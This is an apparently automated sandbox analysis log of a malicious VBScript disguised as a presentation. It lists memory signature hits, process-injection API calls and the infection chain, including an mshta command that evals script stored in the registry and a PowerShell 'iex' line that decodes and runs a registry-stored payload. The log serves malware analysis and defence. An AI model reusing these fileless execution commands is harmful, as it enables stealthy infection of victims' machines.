Source: Yara match	File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

21_2_04BC3276

System Summary:

Writes registry values via WMI

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_6FBB2274	21_2_6FBB2274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC7E30	21_2_04BC7E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC725F	21_2_04BC725F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC1754	21_2_04BC1754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E63570	21_2_05E63570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E490A1	21_2_05E490A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E45C88	21_2_05E45C88
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E4FBA9	21_2_05E4FBA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E543B9	21_2_05E543B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E57B5D	21_2_05E57B5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E5DAED	21_2_05E5DAED
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CBB948	32_2_00CBB948
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CBB230	32_2_00CBB230
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA70C8	32_2_00CA70C8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C990FC	32_2_00C990FC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB88B8	32_2_00CB88B8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C91000	32_2_00C91000
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA7820	32_2_00CA7820
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CAA9F8	32_2_00CAA9F8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA6944	32_2_00CA6944
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CAE95C	32_2_00CAE95C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA4150	32_2_00CA4150
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA1164	32_2_00CA1164
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB5164	32_2_00CB5164
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA0124	32_2_00CA0124
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C92138	32_2_00C92138
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C99AD8	32_2_00C99AD8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CABA74	32_2_00CABA74
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C9ABDC	32_2_00C9ABDC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB4BA0	32_2_00CB4BA0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CBA3A4	32_2_00CBA3A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C91348	32_2_00C91348
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA8340	32_2_00CA8340
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB4354	32_2_00CB4354
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C94B60	32_2_00C94B60
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB730C	32_2_00CB730C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CAD328	32_2_00CAD328
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA4484	32_2_00CA4484
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C974A4	32_2_00C974A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB9408	32_2_00CB9408
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB3400	32_2_00CB3400
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB4DE0	32_2_00CB4DE0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA1DF4	32_2_00CA1DF4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA559C	32_2_00CA559C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA5DBC	32_2_00CA5DBC
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA9500	32_2_00CA9500
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA2EC0	32_2_00CA2EC0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CAC6C4	32_2_00CAC6C4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB5ED8	32_2_00CB5ED8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB2EF8	32_2_00CB2EF8
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C976F4	32_2_00C976F4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CA6684	32_2_00CA6684
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB6EA0	32_2_00CB6EA0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB06B4	32_2_00CB06B4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C93610	32_2_00C93610
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CAA790	32_2_00CAA790
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CAF7B4	32_2_00CAF7B4

Contains functionality to launch a process as a different user

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 21_2_05E5FEAB CreateProcessAsUserW,

21_2_05E5FEAB

Java / VBScript file with very long strings (likely obfuscated code)

Source: presentation[2021.09.09_15-26].vbs

Initial sample: Strings found which are bigger than 50

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_6FBB1382 GetProcAddress,NtCreateSection,memset,	21_2_6FBB1382
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_6FBB14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	21_2_6FBB14FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_6FBB1B4A NtMapViewOfSection,	21_2_6FBB1B4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_6FBB2495 NtQueryVirtualMemory,	21_2_6FBB2495
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC6EB3 GetProcAddress,NtCreateSection,memset,	21_2_04BC6EB3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC40DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	21_2_04BC40DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC7666 NtMapViewOfSection,	21_2_04BC7666
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC8055 NtQueryVirtualMemory,	21_2_04BC8055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E609D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	21_2_05E609D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E5B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	21_2_05E5B58C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E5A8F7 NtMapViewOfSection,	21_2_05E5A8F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E58890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	21_2_05E58890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E5B878 GetProcAddress,NtCreateSection,memset,	21_2_05E5B878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E55878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	21_2_05E55878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E5F7F5 NtQueryInformationProcess,	21_2_05E5F7F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E437F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,	21_2_05E437F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E6079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	21_2_05E6079B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E5A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	21_2_05E5A71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E56657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	21_2_05E56657
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E50E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	21_2_05E50E3E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E555D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	21_2_05E555D6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E45166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	21_2_05E45166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E49D36 NtGetContextThread,RtlNtStatusToDosError,	21_2_05E49D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E50CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	21_2_05E50CEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E60BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	21_2_05E60BAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E50FBD memset,NtQueryInformationProcess,	21_2_05E50FBD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E5FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	21_2_05E5FBB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E4579C NtQuerySystemInformation,RtlNtStatusToDosError,	21_2_05E4579C
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CBA8F0 NtSetInformationProcess,CreateRemoteThread,	32_2_00CBA8F0
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CB20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose,	32_2_00CB20A4
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CAE860 NtQueryInformationProcess,	32_2_00CAE860
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CCF029 NtProtectVirtualMemory,NtProtectVirtualMemory,	32_2_00CCF029
Source: C:\Windows\System32\control.exe	Code function: 32_2_00CCF36B NtProtectVirtualMemory,	32_2_00CCF36B

Source: tjafqng0.dll.27.dr	Static PE information: No import functions for PE file found
Source: qlsida3o.dll.29.dr	Static PE information: No import functions for PE file found

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
Source: unknown	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP'	Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7626F90B-5DEB-18F5-970A-E1CCBBDEA5C0}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C659AAB4-6D66-E894-275A-F19C4B2EB590}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3E61FFA3-8597-20A3-FF52-8954A3A6CDC8}

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_6FBB2210 push ecx; ret	21_2_6FBB2219
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_6FBB2263 push ecx; ret	21_2_6FBB2273
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC7AB0 push ecx; ret	21_2_04BC7AB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_04BC7E1F push ecx; ret	21_2_04BC7E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 21_2_05E6528F push ecx; ret	21_2_05E6529F
Source: C:\Windows\System32\control.exe	Code function: 32_2_00C9C6E9 push 3B000001h; retf	32_2_00C9C6EE

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\fum.cpp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
